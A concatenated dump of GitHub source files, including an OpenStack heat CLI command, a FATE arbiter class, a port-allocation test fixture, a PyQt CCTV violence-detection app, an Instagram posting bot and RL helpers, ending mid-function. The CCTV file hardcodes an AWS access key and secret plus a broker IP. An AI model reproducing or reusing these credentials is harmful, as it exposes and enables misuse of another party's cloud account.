parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\", parsed_args)\n\n if parsed_args.template_type is not None and parsed_args.long:\n msg = _('Cannot use --template-type and --long in one time.')\n raise exc.CommandError(msg)\n\n heat_client = self.app.client_manager.orchestration\n return _show_resourcetype(heat_client, parsed_args)\n\n\ndef _show_resourcetype(heat_client, parsed_args):\n try:\n if parsed_args.template_type:\n template_type = parsed_args.template_type.lower()\n if template_type not in ('hot', 'cfn'):\n raise exc.CommandError(\n _('Template type invalid: %s') % parsed_args.template_type)\n\n fields = {'resource_type': parsed_args.resource_type,\n 'template_type': template_type}\n data = heat_client.resource_types.generate_template(**fields)\n else:\n data = heat_client.resource_types.get(parsed_args.resource_type,\n parsed_args.long)\n except 
heat_exc.HTTPNotFound:\n raise exc.CommandError(\n _('Resource type not found: %s') % parsed_args.resource_type)\n\n rows = list(data.values())\n columns = list(data.keys())\n return columns, rows\n\n\nclass ResourceTypeList(command.Lister):\n \"\"\"List resource types.\"\"\"\n\n log = logging.getLogger(__name__ + '.ResourceTypeList')\n\n def get_parser(self, prog_name):\n parser = super(ResourceTypeList,\n self).get_parser(prog_name)\n parser.add_argument(\n '--filter',\n dest='filter',\n metavar='<key=value>',\n help=_('Filter parameters to apply on returned resource types. '\n 'This can be specified multiple times. It can be any of '\n 'name, version or support_status'),\n action='append'\n )\n parser.add_argument(\n '--long',\n default=False,\n action='store_true',\n help=_('Show resource types with corresponding description of '\n 'each resource type.')\n )\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\", parsed_args)\n\n heat_client = self.app.client_manager.orchestration\n return _list_resourcetypes(heat_client, parsed_args)\n\n\ndef _list_resourcetypes(heat_client, parsed_args):\n resource_types = heat_client.resource_types.list(\n filters=heat_utils.format_parameters(parsed_args.filter),\n with_description=parsed_args.long\n )\n if parsed_args.long:\n columns = ['Resource Type', 'Description']\n rows = sorted([r.resource_type, r.description] for r in resource_types)\n else:\n columns = ['Resource Type']\n rows = sorted([r.resource_type] for r in resource_types)\n return columns, rows\n","repo_name":"openstack/python-heatclient","sub_path":"heatclient/osc/v1/resource_type.py","file_name":"resource_type.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"53"} +{"seq_id":"26900359045","text":"from federatedml.linear_model.coordinated_linear_model.base_linear_model_arbiter import HeteroBaseArbiter\nfrom federatedml.linear_model.coordinated_linear_model.linear_regression.hetero_linear_regression.hetero_linr_base import \\\n HeteroLinRBase\nfrom federatedml.optim.gradient import hetero_linr_gradient_and_loss\nfrom federatedml.param.linear_regression_param import LinearParam\nfrom federatedml.util import consts\nfrom federatedml.transfer_variable.transfer_class.hetero_linr_transfer_variable import HeteroLinRTransferVariable\n\n\nclass HeteroLinRArbiter(HeteroBaseArbiter, HeteroLinRBase):\n def __init__(self):\n super(HeteroLinRArbiter, self).__init__()\n self.gradient_loss_operator = hetero_linr_gradient_and_loss.Arbiter()\n self.model_param = LinearParam()\n self.n_iter_ = 0\n self.header = None\n self.model_param_name = 'HeteroLinearRegressionParam'\n self.model_meta_name = 'HeteroLinearRegressionMeta'\n self.model_name = 'HeteroLinearRegression'\n self.is_converged = False\n self.mode = consts.HETERO\n self.need_call_back_loss = True\n self.transfer_variable = HeteroLinRTransferVariable()\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/linear_model/coordinated_linear_model/linear_regression/hetero_linear_regression/hetero_linr_arbiter.py","file_name":"hetero_linr_arbiter.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"9308471939","text":"#!/usr/bin/env python3\n\nimport socket\n\nimport pytest\n\nNEXT_PORT = 10000\n\n\ndef check_port(port: int) -> bool:\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n udp = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n with tcp, udp:\n try:\n tcp.bind((\"127.0.0.1\", port))\n udp.bind((\"127.0.0.1\", port))\n return True\n except socket.error:\n return False\n\n\ndef check_port_range(port_range: range) -> bool:\n for port in port_range:\n if not check_port(port):\n return False\n return True\n\n\nclass Ports:\n def allocate(self, num: int) -> int:\n \"\"\"\n Allocates\n \"\"\"\n global NEXT_PORT\n while NEXT_PORT + num <= 65535:\n start = NEXT_PORT\n NEXT_PORT += num\n if not check_port_range(range(start, NEXT_PORT)):\n continue\n return start\n raise Exception(\"cannot find enough free port\")\n\n\n@pytest.fixture\ndef ports() -> Ports:\n return Ports()\n","repo_name":"numtide/deploykit","sub_path":"tests/ports.py","file_name":"ports.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"16973885186","text":"import queue\nfrom re import X\nimport threading\nimport cv2\nimport datetime\nimport time, json\nfrom datetime import datetime\nimport boto3\nimport os\nimport moviepy.editor as moviepy\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport time\nimport torch\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport math\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport mediapipe as mp\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.utils import to_categorical\nfrom matplotlib import pyplot as plt\n\n# os.environ['KMP_DUPLICATE_LIB_OK']='True'\n\nfrom PIL import Image as im\nfrom PyQt5.QtWidgets import QMainWindow\nfrom QtApp.QtUI.MainUI import Ui_MainWindow\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5 import QtGui, QtWidgets\nfrom PyQt5.QtCore import *\nfrom CCTV.CcTv import CcTv\nfrom kafka import KafkaProducer\nfrom json import dumps\nfrom yolov5.utils.general import (LOGGER, check_img_size, non_max_suppression, scale_coords, \n check_imshow, xyxy2xywh, increment_path)\nfrom yolov5.utils.torch_utils import select_device, time_sync\nfrom yolov5.utils.plots import Annotator, colors\n\nclass roiimage:\n def __init__(self,frame,x,y,w,h):\n self.frame = frame\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n\nclass MainWindow(QMainWindow):\n def initialize(self, mainForm: Ui_MainWindow):\n print(torch.cuda.is_available())\n self.mainForm = mainForm\n self.producer = KafkaProducer(acks=0, compression_type='gzip', bootstrap_servers=['52.79.114.28:9092'], value_serializer=lambda v: json.dumps(v).encode('utf-8')) \n self.setWindowIcon(QIcon(\"icon.png\"))\n self.cnt = 0\n self.cctv_1 = None\n self.cctv_2 = None\n self.cctv_3 = None\n self.cctv_4 = None\n self.assult = False\n self.center_prev_points = []\n self.tracking_objects = {}\n self.track_id = 0\n self.count = -1\n self.static_image_mode=False\n self.upper_body_only = False\n self.roi_person = None\n smoth_landmarks=True\n min_detection_confidence=0.5\n min_tracking_confidence=0.5\n self.roi_que = queue.Queue()\n self.model = torch.hub.load('ultralytics/yolov5', 'custom', path='./yolov5s.pt', force_reload=True)\n self.Frame_1 = None\n # self.model = torch.hub.load('ultralytics/yolov5', 'yolov5m')\n # self.device = select_device(0)\n # cfg = get_config()\n # cfg.merge_from_file(\"deep_sort/configs/deep_sort.yaml\")\n # self.deepsort = DeepSort('osnet_x0_25',\n # max_dist=cfg.DEEPSORT.MAX_DIST,\n # max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n # max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, 
nn_budget=cfg.DEEPSORT.NN_BUDGET,\n # use_cuda=True)\n\n # self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names\n \n self.s3 = self.s3_connection()\n self.CCTV_start()\n self.thread_CCTV = Worker(target=self.thread_CCTV_run)\n self.thread_CCTV.start()\n self.modeltf = None\n test = Worker(target=self.testfunc)\n test.start()\n\n\n def s3_connection(self):\n try:\n s3 = boto3.client(\n service_name=\"s3\",\n region_name=\"ap-northeast-2\", # 자신이 설정한 bucket region\n aws_access_key_id=\"AKIAZM2UBXT27P5Z2PGL\",\n aws_secret_access_key=\"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\",\n )\n except Exception as e:\n print(e)\n\n else:\n print(\"s3 bucket connected!\")\n return s3\n\n def s3_put_object(self, bucket, filepath, access_key):\n \"\"\"\n s3 bucket에 지정 파일 업로드\n :param s3: 연결된 s3 객체(boto3 client)\n :param bucket: 버킷명\n :param filepath: 파일 위치\n :param access_key: 저장 파일명\n :return: 성공 시 True, 실패 시 False 반환\n \"\"\"\n try:\n self.s3.upload_file(\n Filename=filepath,\n Bucket=bucket,\n Key=access_key,\n ExtraArgs={\"ContentType\": \"video/mp4\", \"ACL\": \"public-read\"},\n )\n print(\"upload video to aws s3!\")\n except Exception as e:\n return False\n return True\n\n def s3_get_image_url(self, filename):\n \"\"\"\n s3 : 연결된 s3 객체(boto3 client)\n filename : s3에 저장된 파일 명\n \"\"\"\n location = self.s3.get_bucket_location(Bucket=\"ssafit-01-bucket\")[\"LocationConstraint\"]\n return f\"https://ssafit-01-bucket.s3.{location}.amazonaws.com/{filename}.mp4\"\n\n def thread_CCTV_run(self):\n Frame_2, Frame3, Frame4 = None, None, None\n center_points = []\n if self.cctv_1 != None and self.cctv_1.grab():\n _, self.Frame_1 = self.cctv_1.retrieve()\n self.count += 1\n if self.Frame_1 is not None:\n result = self.model(self.Frame_1, size=640)\n # result = self.model(Frame_1, augment = True)\n labels, cord = result.xyxyn[0][:,-1].cpu().numpy(), result.xyxyn[0][:, :-1].cpu().numpy()\n\n # annotator = Annotator(Frame_1, line_width=2, pil=not ascii)\n # det = result.pred[0]\n\n # if det is not None and len(det):\n # xywhs = xyxy2xywh(det[:, 0:4])\n # confs = det[:, 4]\n # clss = det[:, 5]\n # outputs = self.deepsort.update(xywhs.cpu(), confs.cpu(), clss.cpu(), Frame_1)\n # if len(outputs) > 0:\n # for j, (output, conf) in enumerate(zip(outputs, confs)):\n\n # bboxes = output[0:4]\n # id = output[4]\n # cls = output[5]\n\n # c = int(cls) # integer class\n # label = f'{id} {self.names[c]} {conf:.2f}'\n # annotator.box_label(bboxes, label, color=colors(c, True))\n\n # result_img = annotator.result()\n\n # print(result)\n ob = -1\n objectpoint = []\n if len(cord)>0:\n temp = []\n for box in cord:\n ob+=1\n if int(labels[ob]) != 0 or box[4] < 0.8:\n continue\n height, width, c = self.Frame_1.shape\n x = box[0]*width\n y = box[1]*height\n w = box[2]*width - x\n h = box[3]*height - y\n self.roi_person = self.Frame_1[int(y):int(y+h),int(x):int(x+w)]\n pose_img = self.roi_person.copy()\n roi_info = roiimage(pose_img, x,y,w,h)\n temp.append(roi_info)\n cx = (x + x + w)/2\n cy = (y + y + h)/2\n center_points.append((int(cx),int(cy)))\n objectpoint.append((int(cx),int(cy)))\n index = 0\n ob = -1\n for pt in objectpoint:\n inner_index = 0\n for pt2 in objectpoint:\n if index >= inner_index:\n inner_index+=1\n continue\n dis = math.hypot(pt2[0] - pt[0], pt2[1] - pt[1])\n if dis<temp[inner_index].w and self.roi_que.empty()==True:\n temp_ob = temp[inner_index]\n self.roi_que.put(temp_ob)\n temp_ob = temp[index]\n self.roi_que.put(temp_ob)\n inner_index+=1\n index+=1\n for box in cord:\n 
ob+=1\n if int(labels[ob]) != 0 or box[4] < 0.8:\n continue\n height, width, c = self.Frame_1.shape\n x = box[0]*width\n y = box[1]*height\n w = box[2]*width - x\n h = box[3]*height - y\n # cx = (x + x + w)/2\n # cy = (y + y + h)/2\n # center_points.append((int(cx),int(cy)))\n # objectpoint.append((int(cx),int(cy)))\n # # cv2.circle(self.Frame_1, (int(cx),int(cy)), 5, (0,0,255),-1)\n cv2.rectangle(self.Frame_1, (int(x),int(y)), (int(x+w), int(y+h)), (0,255,0), 2)\n if(self.count <= 2):\n for pt in center_points:\n for pt2 in self.center_prev_points:\n distance = math.hypot(pt2[0] - pt[0], pt2[1] - pt[1])\n\n if distance < 50:\n self.tracking_objects[self.track_id] = pt\n self.track_id+=1\n else :\n tracking_objects_copy = self.tracking_objects.copy()\n center_points_copy = center_points.copy()\n\n for object_id,pt2 in tracking_objects_copy.items():\n object_exists = False\n for pt in center_points_copy:\n distance = math.hypot(pt2[0] - pt[0], pt2[1] - pt[1])\n\n if distance < 50:\n self.tracking_objects[object_id] = pt\n object_exists = True\n if pt in center_points:\n center_points.remove(pt)\n continue\n if not object_exists:\n self.tracking_objects.pop(object_id)\n\n for pt in center_points:\n self.tracking_objects[self.track_id] = pt\n self.track_id += 1\n\n for object_id, pt in self.tracking_objects.items():\n cv2.circle(self.Frame_1, pt, 5, (0,0,255), -1)\n cv2.putText(self.Frame_1, str(object_id), (pt[0], pt[1]), 0, 1, (0, 0, 255), 2)\n\n # print(\"TRACKING\")\n # print(self.tracking_objects)\n\n width = (int)((self.mainForm.centralwidget.width()-227)/2)-10\n height = (int)((self.mainForm.centralwidget.height()-20)/2)-10\n pixmap = QtGui.QPixmap(\n self.convert_image_to_QImage(\n self.resize_image(self.Frame_1, width, height)\n # self.resize_image(np.squeeze(result.render()), width, height)\n ))\n self.mainForm.cctv_1.setPixmap(pixmap)\n \n self.mainForm.cctv_1.update()\n self.center_prev_points = center_points.copy()\n\n if self.assult == True : # if 상황이 발생하면\n self.cnt = 1\n t = threading.Thread(target=self.record) # video 녹음 쓰레드\n t.start()\n\n # 형이 하나하나 전처리한 프레임을 리스트에 넣어서 주는 방식으로 하시는지\n # cctv(전처리) -> record\n\n def record(self):\n self.assult = False\n cctv_1 = CcTv.rtsp()\n trigger = True\n flag = True\n start = time.time()\n while trigger == True :\n Frame_1, Frame_2, Frame3, Frame4 = None, None, None, None\n if cctv_1 != None and cctv_1.grab():\n _, Frame_1 = cctv_1.retrieve()\n\n if flag == True :\n print(\"video record start!\")\n now = datetime.datetime.now().strftime(\"%d_%H-%M-%S\")\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n path = \"C:/Users/dlrjs/Desktop/S06P31E202/AI/\" + str(now) + \".avi\"\n realpath = \"C:/Users/dlrjs/Desktop/S06P31E202/AI/\" + str(now) + \".mp4\"\n video = cv2.VideoWriter(\"C:/Users/dlrjs/Desktop/S06P31E202/AI/\" + str(now) + \".avi\", fourcc, 20.0, (Frame_1.shape[1], Frame_1.shape[0]))\n \n flag = False\n \n video.write(Frame_1)\n \n if (time.time() - start) > 5 : # 검출되었으면... 5초후에 저장(프로토타입). 
..ex) if (폭력이 감지되면...)\n trigger = False\n video.release()\n clip = moviepy.VideoFileClip(path)\n clip.write_videofile(realpath)\n print(\"video record end!\")\n print(self.s3_put_object(\"ssafit-01-bucket\", realpath, str(now)+ \".mp4\"))\n if os.path.isfile(path):\n os.remove(path)\n if os.path.isfile(realpath):\n os.remove(realpath) \n # connect to web\n url = self.s3_get_image_url(str(now))\n data = {'url' : url,\n 'detection' : '0',\n 'cameraNumber' : '1'}\n self.producer.send('kafka-demo2', value=data)\n \n def CCTV_start(self):\n self.cctv_1 = CcTv.rtsp()\n\n def convert_image_to_QImage(self, img):\n\n height, width, channel = img.shape\n bytesPerLine = width * channel\n format = QtGui.QImage.Format_RGB888\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n return QtGui.QImage(img.data, width, height, bytesPerLine, format)\n\n def resize_image(self, img, width, height):\n return cv2.resize(img, dsize=(width, height),fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)\n def testfunc(self):\n sequence = []\n sentence = []\n predictions = []\n threshold = 0.5\n actions = np.array(['assult', 'stand', 'fall'])\n self.modeltf = tf.keras.models.load_model('action.h5')\n while True:\n if(self.roi_que.empty()!=True):\n frame_info = self.roi_que.get()\n mpDraw = mp.solutions.drawing_utils\n mpPose = mp.solutions.pose\n pose = mpPose.Pose()\n roi = cv2.cvtColor(frame_info.frame,cv2.COLOR_BGR2RGB)\n results = pose.process(roi)\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33*4)\n keypoints = np.concatenate([pose])\n sequence.append(keypoints)\n sequence = sequence[-1:]\n if len(sequence) == 1:\n res = self.modeltf.predict(np.expand_dims(sequence, axis=0))[0]\n print(res)\n abnor = actions[np.argmax(res)]\n predictions.append(np.argmax(res))\n if abnor == \"assult\":\n self.assult = True\n str = \"{:%Y%m%d%H%M%S}\".format(datetime.now()) + \" 폭행 발생\"\n self.mainForm.textBrowser.append(str)\n if np.unique(predictions[-10:])[0]==np.argmax(res): \n if res[np.argmax(res)] > threshold: \n \n if len(sentence) > 0: \n if actions[np.argmax(res)] != sentence[-1]:\n sentence.append(actions[np.argmax(res)])\n else:\n sentence.append(actions[np.argmax(res)])\n\n if len(sentence) > 5: \n sentence = sentence[-5:]\n if results.pose_landmarks:\n mpDraw.draw_landmarks(frame_info.frame, results.pose_landmarks,mpPose.POSE_CONNECTIONS)\n # self.Frame_1[int(frame_info.y):int(frame_info.y+frame_info.h),int(frame_info.x):int(frame_info.x+frame_info.w)] = frame_info.frame\n # width = (int)((self.mainForm.centralwidget.width()-227)/2)-10\n # height = (int)((self.mainForm.centralwidget.height()-20)/2)-10\n # pixmap = QtGui.QPixmap(\n # self.convert_image_to_QImage(\n # self.resize_image(frame_info.frame, width, height)\n # # self.resize_image(np.squeeze(result.render()), width, height)\n # ))\n # self.mainForm.cctv_2.setPixmap(pixmap)\n \n # self.mainForm.cctv_2.update()\n else:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nclass Worker(QThread):\n def __init__(self, target):\n assert callable(target)\n super().__init__()\n self.func = target\n self.isWorking = True\n\n def run(self):\n while self.isWorking:\n self.func()\n self.sleep(0)\n","repo_name":"sorrow4468/SSAFY-final-WooRiA.I","sub_path":"AI/QtApp/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":17456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
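For readers following the tracking logic in the record above: frame-to-frame identity assignment there is plain Euclidean centroid tracking (match each existing track to the nearest new detection within a pixel threshold, spawn new ids for the rest). A minimal self-contained sketch of that technique follows; the 50-pixel threshold mirrors the hard-coded distance check above and is an assumption for illustration, not the project's actual class.

import math

class CentroidTracker:
    # Greedy nearest-centroid matcher: an object keeps its id while its centroid
    # stays within max_dist pixels of its position in the previous frame.
    def __init__(self, max_dist=50):
        self.max_dist = max_dist
        self.next_id = 0
        self.objects = {}  # id -> (cx, cy)

    def update(self, centroids):
        updated = {}
        unmatched = list(centroids)
        for obj_id, prev in self.objects.items():
            best = None
            for pt in unmatched:
                d = math.hypot(pt[0] - prev[0], pt[1] - prev[1])
                if d < self.max_dist and (best is None or d < best[0]):
                    best = (d, pt)
            if best is not None:
                updated[obj_id] = best[1]   # track follows its nearest detection
                unmatched.remove(best[1])
        for pt in unmatched:                # unmatched detections become new tracks
            updated[self.next_id] = pt
            self.next_id += 1
        self.objects = updated
        return updated

tracker = CentroidTracker()
print(tracker.update([(100, 100), (300, 120)]))  # {0: (100, 100), 1: (300, 120)}
print(tracker.update([(104, 98), (305, 118)]))   # ids follow the nearest centroids

Greedy nearest-match like this can swap ids when people cross paths; assignment-based matching (e.g. the Hungarian algorithm, as in SORT-style trackers) or the DeepSort integration commented out in the record above is the usual hardening.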
+{"seq_id":"31045374776","text":"a = int(input(\"\\nPlease Enter Starting Number For Your List: \"))\nb = int(input(\"Please Enter Ending Number For Your List: \"))\nnum = list (range(a,b+1))\nprint(f\"\\nThis is Your List: {num}\")\n\n# Reverse function\ndef r_ls(l):\n return l[::-1]\nprint(f\"\\nReverse of your List: {r_ls(num)}\")\n\n# pop append method\n\ndef reverse_ls(ls):\n reverse = []\n for i in range (len(ls)):\n pop_item = ls.pop()\n reverse.append(pop_item)\n return reverse\nprint(f\"\\nReverse of Your List: {reverse_ls(num)}\")\n","repo_name":"arpitgupta630/Python","sub_path":"Youtube/C05E02.py","file_name":"C05E02.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20804552785","text":"import schedule\nimport requests\nimport os\nimport time\nimport shutil\nfrom instagrapi import Client\nfrom uuid import uuid4\n\nTHIS_PERSON_DOES_NOT_EXIST = 'https://thispersondoesnotexist.com/image'\nDEFAULT_CAPTION = f'This Person does not exist!\\nCredits to {THIS_PERSON_DOES_NOT_EXIST}'\nCACHE_DIR = r'./.cache/'\nFILE_EXTENSION = '.jpg'\n\ndef store_new_image() -> str:\n image_id = str(uuid4())\n response = requests.get(THIS_PERSON_DOES_NOT_EXIST, stream=True)\n if response.status_code != 200:\n print('Something went wrong when requesting new image.')\n print(f'Status Code = {response.status_code}')\n print(f'Content = {response.text}')\n return store_new_image()\n with open(CACHE_DIR + image_id + FILE_EXTENSION, 'wb') as image:\n shutil.copyfileobj(response.raw, image)\n image.close()\n print('Successfully downloaded new image: ' + image_id)\n return image_id\n\ndef post_new_image(client: Client, image: str, caption: str=DEFAULT_CAPTION):\n media = client.photo_upload(CACHE_DIR + image + FILE_EXTENSION, caption).dict()\n image_id, taken_at = media['id'], media['taken_at']\n print(f'Uploaded new Image {image}: \\nid = {image_id}\\ntaken_at = {taken_at}')\n\ndef run_schedule(client):\n image_id = store_new_image()\n post_new_image(client, image_id)\n \nif __name__ == '__main__':\n print('Creating Cache storage if not existing...')\n if not os.path.exists(CACHE_DIR):\n os.mkdir(CACHE_DIR)\n print(f'Created {CACHE_DIR} for caching images')\n username = os.getenv('USERNAME')\n password = os.getenv('PASSWORD')\n client = Client()\n client.login(username, password)\n schedule.every(12).hours.do(run_schedule, client)\n while True:\n schedule.run_pending()\n time.sleep(5)\n","repo_name":"MoMMde/this-person-is-on-instagram","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3414689965","text":"\"\"\"\n\n\"\"\"\nfrom PyQt5.QtCore import Qt, QObject, QSortFilterProxyModel, pyqtSlot\nfrom PyQt5.QtSql import QSqlTableModel\n\nfrom genial.controllers.propertiescontroller import PropertiesController\nfrom genial import application\n\n\nclass PropertiesService(QObject):\n controller = None # type: PropertiesController\n question_type_model = None # type: QSqlTableModel\n question_type_filter_proxy_model = None # type: 'QuestionTypeFilterProxyModel'\n\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n self.connect_slots()\n\n def connect_slots(self):\n application.app.aboutToQuit.connect(\n self.on_about_to_quit\n )\n\n def dispose(self):\n pass\n\n def show(self, tab_wanted: str = 'general'):\n from genial.services import 
document_service\n if document_service.database is not None:\n if self.question_type_model is None:\n self.question_type_model = QSqlTableModel(\n self,\n document_service.database\n )\n self.question_type_model.setTable(\"question_type\")\n self.question_type_model.setEditStrategy(\n QSqlTableModel.OnManualSubmit\n )\n self.question_type_filter_proxy_model = QuestionTypeFilterProxyModel()\n self.question_type_filter_proxy_model.setSourceModel(\n self.question_type_model\n )\n self.question_type_filter_proxy_model.sort(\n self.question_type_model.fieldIndex(\"position\"),\n Qt.AscendingOrder\n )\n self.question_type_filter_proxy_model.setDynamicSortFilter(True)\n\n if self.controller is None:\n self.controller = PropertiesController()\n self.controller.start()\n self.controller.show(tab_wanted)\n\n @pyqtSlot()\n def on_about_to_quit(self):\n self.dispose()\n\n\nclass QuestionTypeFilterProxyModel (QSortFilterProxyModel):\n pass\n\n","repo_name":"adamscott/genial","sub_path":"genial/services/propertiesservices.py","file_name":"propertiesservices.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1958969573","text":"\nfrom virtual_modi.virtual_module.virtual_module import VirtualModule\n\n\nclass VirtualDial(VirtualModule):\n\n DEGREE = 2\n TURNSPEED = 3\n\n def __init__(self, message_handler):\n super(VirtualDial, self).__init__(message_handler)\n self.type = 'dial'\n self.uuid = self.generate_uuid(0x2040)\n\n self.degree = 0\n self.turnspeed = 0\n\n self.attach()\n\n def run(self):\n self.send_property_message(self.DEGREE, self.degree)\n self.send_property_message(self.TURNSPEED, self.turnspeed)\n","repo_name":"LUXROBO/virtual-modi","sub_path":"virtual_modi/virtual_module/virtual_input_module/virtual_dial.py","file_name":"virtual_dial.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185644350","text":"L, R = map(int, input().split(\" \"))\nmod = 10**9 + 7\n\nn = 1\ni = 0\nln, rn = -1, -1\nwhile True:\n if ln == -1 and (n - 1) >= L:\n ln = i - 1\n\n if rn == -1 and (n - 1) >= R:\n rn = i\n break\n n *= 2\n i += 1\n\nprint(ln, rn)\nans = (pow(rn, 3, mod) - pow(ln, 3, mod) + mod) % mod\nprint(ans)\nls = 2**ln\nfor i in range(ls, L):\n for j in range(i, L):\n if (j % i) == (j ^ i):\n ans -= 1\nrd = 2**rn\nfor i in range(R + 1, rd):\n for j in range(i, rd):\n if (j % i) == (j ^ i):\n ans -= 1\n\nprint((ans + mod) % mod)","repo_name":"banboooo044/AtCoder","sub_path":"ABC138/F2.py","file_name":"F2.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27113974680","text":"# import wx\n \n# app = wx.App()\n \n# frame = wx.Frame(None, -1)\n \n# # Create text input\n# dlg = wx.TextEntryDialog(frame, 'Enter some text','Text Entry')\n# dlg.SetSize(0,0,200,50)\n# dlg.SetWindowStyle(wx.STAY_ON_TOP )\n# dlg.SetValue(\"Default\")\n# if dlg.ShowModal() == wx.ID_OK:\n# print('You entered: %s\\n' % dlg.GetValue())\n# dlg.Destroy()\n\nimport wx\n \n########################################################################\nclass StayOnTopFrame(wx.Frame):\n \"\"\"\n A frame that stays on top of all the others\n \"\"\"\n \n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n on_top = wx.DEFAULT_FRAME_STYLE | wx.STAY_ON_TOP\n 
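# wx.STAY_ON_TOP keeps this frame above all other top-level windows; OR-ing it with wx.DEFAULT_FRAME_STYLE preserves the normal caption and borders\n 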
wx.Frame.__init__(self, None, title=\"Stay on top\", style=on_top)\n panel = wx.Panel(self)\n self.Show()\n \n#----------------------------------------------------------------------\nif __name__ == \"__main__\":\n app = wx.App(False)\n frame = StayOnTopFrame()\n app.MainLoop()","repo_name":"asqum/PYQUM","sub_path":"TEST/BETAsite/PyGUI/User_Dialogue_wx.py","file_name":"User_Dialogue_wx.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26877461815","text":"#!/usr/bin/env python3\nimport sys\nimport os\n\nsys.path.append(os.path.abspath(os.path.join(\"../../\", \"src\")))\nimport gym\nimport numpy as np\nimport argparse\nfrom tensorboardX import SummaryWriter\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.utils as nn_utils\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom common import hyperparameters\nfrom common import utils\nimport ptan\nimport time\n\n\ndef unpack_batch(batch, net, device=\"cpu\"):\n \"\"\"Takes in a batch of environment transitions\n\n Args:\n batch: batch of stored experiences/environment transitions\n net: neural network\n device: cpu or cuda\n\n Returns:\n states variable, actions tensor, Q values\n \"\"\"\n\n params = hyperparameters.PARAMS[\"pong_a2c\"]\n states = []\n actions = []\n rewards = []\n not_done_idx = []\n last_states = []\n\n for idx, exp in enumerate(batch):\n states.append(np.array(exp.state, copy=False))\n actions.append(int(exp.action))\n rewards.append(exp.reward)\n if exp.last_state is not None:\n not_done_idx.append(idx)\n last_states.append(np.array(exp.last_state, copy=False))\n\n states_v = torch.FloatTensor(states).to(device)\n actions_t = torch.LongTensor(actions).to(device)\n\n # handle rewards\n rewards_np = np.array(rewards, dtype=np.float32)\n\n if not_done_idx:\n last_states_v = torch.FloatTensor(last_states).to(device)\n last_vals_v = net(last_states_v)[1]\n last_vals_np = last_vals_v.data.cpu().numpy()[:, 0]\n rewards_np[not_done_idx] += (\n params[\"gamma\"] ** params[\"step_count\"] * last_vals_np\n )\n\n ref_vals_v = torch.FloatTensor(rewards_np).to(device)\n return states_v, actions_t, ref_vals_v\n\n\ndef unpack_batch_continuous(batch, net, last_val_gamma, device=\"cpu\"):\n \"\"\"\n Convert batch into training tensors\n :param batch:\n :param net:\n :return: states variable, actions tensor, reference values variable\n \"\"\"\n states = []\n actions = []\n rewards = []\n not_done_idx = []\n last_states = []\n for idx, exp in enumerate(batch):\n states.append(exp.state)\n actions.append(exp.action)\n rewards.append(exp.reward)\n if exp.last_state is not None:\n not_done_idx.append(idx)\n last_states.append(exp.last_state)\n states_v = utils.float32_preprocessor(states).to(device)\n actions_v = torch.FloatTensor(actions).to(device)\n\n # handle rewards\n rewards_np = np.array(rewards, dtype=np.float32)\n if not_done_idx:\n last_states_v = utils.float32_preprocessor(last_states).to(device)\n last_vals_v = net(last_states_v)[2]\n last_vals_np = last_vals_v.data.cpu().numpy()[:, 0]\n rewards_np[not_done_idx] += last_val_gamma * last_vals_np\n\n ref_vals_v = torch.FloatTensor(rewards_np).to(device)\n return states_v, actions_v, ref_vals_v\n\n\ndef unpack_batch_a2c(batch, net, last_val_gamma, device=\"cpu\"):\n \"\"\"\n Convert batch into training tensors\n :param batch:\n :param net:\n :return: states variable, actions tensor, reference values variable\n \"\"\"\n states = []\n actions = []\n rewards = []\n 
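# indices of transitions whose episode did not end within the rollout; their returns are bootstrapped below with last_val_gamma * V(last_state)\n 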
